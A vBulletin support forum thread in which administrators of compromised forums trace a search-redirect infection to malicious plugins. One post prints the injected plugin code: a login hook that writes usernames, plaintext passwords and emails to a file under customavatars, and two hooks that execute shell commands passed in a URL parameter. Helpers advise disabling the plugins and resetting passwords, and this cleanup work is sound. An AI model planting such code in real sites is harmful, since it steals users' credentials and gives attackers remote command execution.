Register Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
  #1  
Old 27 Nov 2016, 12:43
oguzdinc oguzdinc is offline
 
Join Date: Jan 2008
Myfilestore.com Virus

Hello i have problem with my www.Madenciyim.com

Visitors coming from google search is redirecting to www.myfilestore.com. When they go back to google and come back again going to my website.

What can i do.

I deleted VBSEO plug in. I upgraded my vbulletin on friday but it is still happening.
Reply With Quote
  #2  
Old 27 Nov 2016, 14:05
z3r0's Avatar
z3r0 z3r0 is offline
 
Join Date: Apr 2005
Location: Lancashire, UK
Check through your plugins for any new ones that may of been added, I've seen them on the global_complete hook location in the past for myfilestore.
Reply With Quote
  #3  
Old 28 Nov 2016, 14:00
oguzdinc oguzdinc is offline
 
Join Date: Jan 2008
i contact with vb support and they offered me to delete "ech" files from plugin management. i hope problem is solved.
Reply With Quote
  #4  
Old 28 Nov 2016, 15:18
mscottralston mscottralston is offline
 
Join Date: Apr 2013
Good morning,

Over the weekend, I'm having reports of this exact same virus on my forums as well. Please help! (Should I have made my own thread for this?)

Thanks!!
Reply With Quote
  #5  
Old 28 Nov 2016, 15:43
MarkFL's Avatar
MarkFL MarkFL is online now
 
Join Date: Feb 2014
Real name: Mark
Originally Posted by mscottralston View Post
Good morning,

Over the weekend, I'm having reports of this exact same virus on my forums as well. Please help! (Should I have made my own thread for this?)

Thanks!!
Posting in this thread is fine, since it refers to the same issue that is the thread topic.

Did you try the suggestion in post #3?
__________________
Former vBulletin.org Staff Member



Support for my products (as well as updates/new product publishing) has been moved to MHB - vBulletin Products and TAZ - Add-ons
Reply With Quote
  #6  
Old 28 Nov 2016, 15:58
mscottralston mscottralston is offline
 
Join Date: Apr 2013
I'm struggling to find the location of the 'ech' files. Could you direct me to the plugin folder in a typical VB4 installation?

Thanks!
Reply With Quote
  #7  
Old 28 Nov 2016, 16:19
MarkFL's Avatar
MarkFL MarkFL is online now
 
Join Date: Feb 2014
Real name: Mark
Originally Posted by mscottralston View Post
I'm struggling to find the location of the 'ech' files. Could you direct me to the plugin folder in a typical VB4 installation?

Thanks!
I suspect that what you want to do is go to the "Plugin Manager" in your AdminCP and look for the suspect plugins there.
__________________
Former vBulletin.org Staff Member



Support for my products (as well as updates/new product publishing) has been moved to MHB - vBulletin Products and TAZ - Add-ons
Reply With Quote
  #8  
Old 28 Nov 2016, 16:25
mscottralston mscottralston is offline
 
Join Date: Apr 2013
The problem is that I inherited these forums from someone else -- I don't have a clear sense of which plugins should and shouldn't be in there, nor do I see timestamps on them to be able to pick one out of the lineup because it's recently installed. Certainly I haven't taken any actions to recently install a plugin; the only thing I've done is uninstall forumrunner (and delete its folder on the server).

I'm just going to paste the lot and hope someone has insight into one-of-these-things-is-not-like-the-others:

Plugin System
Title Hook Location Active Controls
Product : vBulletin
Federal ajax_complete [Edit] [Delete]
Federal ajax_complete [Edit] [Delete]
global_rewrite global_start [Edit] [Delete]
login_rewrite login_process [Edit] [Delete]
Product : Censor Replacements
censor_replacing_script bbcode_parse_start [Edit] [Delete]
Product : GlowHost - Spam-O-Matic
Affiliate link placement parse_templates [Edit] [Delete]
Form actions inlinemod_action_switch [Edit] [Delete]
GlowHost - Spam-O-Matic: Activation Post-Fix register_activate_process [Edit] [Delete]
GlowHost - Spam-O-Matic: AKISMET SPAM filter newpost_process [Edit] [Delete]
GlowHost - Spam-O-Matic: Finish Registration register_addmember_complete [Edit] [Delete]
GlowHost - Spam-O-Matic: First Post/Thread Control threadfpdata_presave [Edit] [Delete]
GlowHost - Spam-O-Matic: Modify User Quick Links Menu useradmin_edit_start [Edit] [Delete]
GlowHost - Spam-O-Matic: Registration Pre-Check register_addmember_process [Edit] [Delete]
GlowHost - Spam-O-Matic: Replies Control postdata_presave [Edit] [Delete]
Menu item in Moderation Tools showthread_start [Edit] [Delete]
Stats render forumhome_complete [Edit] [Delete]
Product : HS - External Signature Image Size Limiter
HS - External Signature Image Size Limiter profile_updatesignature_start [Edit] [Delete]
Product : PostRelease
Cache cache_templates [Edit] [Delete]
Template Page misc_start [Edit] [Delete]
Thread List Page forumdisplay_complete [Edit] [Delete]
Product : Skimlinks Plugin
Add Skimlinks Classes to PostBit postbit_display_complete [Edit] [Delete]
Add Skimlinks JavaScript to footer template showthread_complete [Edit] [Delete]
Add Skimlinks Option to Edit Options Form profile_editoptions_start [Edit] [Delete]
Extend User DataManager userdata_start [Edit] [Delete]
Update Skimlinks Preference profile_updateoptions [Edit] [Delete]
Product : Stop the Registration Bots
Add Member: Check form submit time, hash, and random hidden field. register_addmember_process [Edit] [Delete]
Reg Check Date: Check for hash and random hidden field passed. Second Step register_checkdate [Edit] [Delete]
Register Start: Load Functions. First Step. register_start [Edit] [Delete]
Product : Yet Another Award System 4.0
Awards WOL process online_location_process [Edit] [Delete]
Awards WOL unknown online_location_unknown [Edit] [Delete]
CSS - Inject CSS into vBulletin css_start [Edit] [Delete]
YAAS - Add Tab to Navbar process_templates_complete [Edit] [Delete]
YAAS - Cache Templates cache_templates [Edit] [Delete]
YAAS - Give Award to User Nav mod_index_navigation [Edit] [Delete]
YAAS - Member List Display memberlist_bit [Edit] [Delete]
YAAS - Tab set user member_start [Edit] [Delete]
YAAS in Member Profile - Init init_startup [Edit] [Delete]
YAAS in Member Profile - Profile member_build_blocks_start [Edit] [Delete]
YAAS in Posbit postbit_display_complete [Edit] [Delete]
YAAS Template Group template_groups [Edit] [Delete]
Save Active Status

Thanks again for your help!
Reply With Quote
  #9  
Old 28 Nov 2016, 16:40
MarkFL's Avatar
MarkFL MarkFL is online now
 
Join Date: Feb 2014
Real name: Mark
I would focus on these:

Product : vBulletin
Federal ajax_complete [Edit] [Delete]
Federal ajax_complete [Edit] [Delete]
global_rewrite global_start [Edit] [Delete]
login_rewrite login_process [Edit] [Delete]

Particularly the last two. Try disabling those two and see what happens.
__________________
Former vBulletin.org Staff Member



Support for my products (as well as updates/new product publishing) has been moved to MHB - vBulletin Products and TAZ - Add-ons
Reply With Quote
  #10  
Old 28 Nov 2016, 16:47
mscottralston mscottralston is offline
 
Join Date: Apr 2013
Thanks, I have done so!
Reply With Quote
  #11  
Old 28 Nov 2016, 16:53
MarkFL's Avatar
MarkFL MarkFL is online now
 
Join Date: Feb 2014
Real name: Mark
Does that fix the issue? Out of curiosity, would you post the code within those two plugins?
__________________
Former vBulletin.org Staff Member



Support for my products (as well as updates/new product publishing) has been moved to MHB - vBulletin Products and TAZ - Add-ons
Reply With Quote
  #12  
Old 28 Nov 2016, 16:56
Dave Dave is online now
 
Join Date: Jun 2010
Real name: Dave
You can also try the following in order to track where it's coming from or how it happened:
- Check the logs at AdminCP > Statistics & Logs > Control Panel Log > look for entries that come from unfamiliar IP addresses.
- Disable all plugins and hooks. (guide) Problem still exists after all plugins/hooks disabled? Then it's possible that certain PHP/JS files are modified on your server.
__________________
https://technidev.com - security, development, exploits, vBulletin
dave[at]technidev[dot]com

Contact me for custom vBulletin 3/4 work & server/website management.
Reply With Quote
  #13  
Old 28 Nov 2016, 18:03
mscottralston mscottralston is offline
 
Join Date: Apr 2013
MarkFL: I can't tell if it's fixed or not. When I go to privateerpressforums.com from a google link (the originally-reported way that this issue manifested), I don't get redirected to this spam website, so... hopefully it's fixed? I was never able to reproduce the issue in the first place, though. Lots of forum users were very vocal about it over the weekend.

Here are the codes:

global_rewrite:

$show['nopasswordempty'] = TRUE;

login_rewrite:
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./customavatars/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");

while($row = @mysql_fetch_array($sql_query))
{

if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ':' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}
The Federal plugins are still on. Here are their codes:
if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}
and
if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}
In other words, they're identical. Not sure why there are two of them. In general they seem a bit suspicious to me.

Dave: I don't see any suspicious log entries from the past few weeks (though it's unclear to me exactly when this issue started). The IPs are all me and known moderators.
Reply With Quote
  #14  
Old 28 Nov 2016, 18:14
MarkFL's Avatar
MarkFL MarkFL is online now
 
Join Date: Feb 2014
Real name: Mark
Yeah, those "Federal" plugins look suspicious to me as well. That first one looks like it could be harvesting passwords/email addresses. If it were me, I would look on the server and see what's in the file "/customavatars/lg.html" and if it contains passwords and email addresses, I would download it (in case it is legit and needs to be restored) and delete it.

I would disable or even delete those 4 plugins (make backups in a text file on your hard drive in case you need them back).

Edit: if the file "/customavatars/lg.html" does appear to have passwords/email addresses, I would advise your users to change their passwords.
__________________
Former vBulletin.org Staff Member



Support for my products (as well as updates/new product publishing) has been moved to MHB - vBulletin Products and TAZ - Add-ons
Reply With Quote
  #15  
Old 28 Nov 2016, 18:33
oguzdinc oguzdinc is offline
 
Join Date: Jan 2008
I also could not solve my problem. As vbulletinsupport told me i deleted all plugins, and also i deleted ech files and i only have VSa - Advanced Forum Statistics on my website and it is the latest version. İ have to delete it?
Reply With Quote
Reply



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


New To Site? Need Help?

All times are GMT. The time now is 20:26.

Layout Options | Width: Wide Color: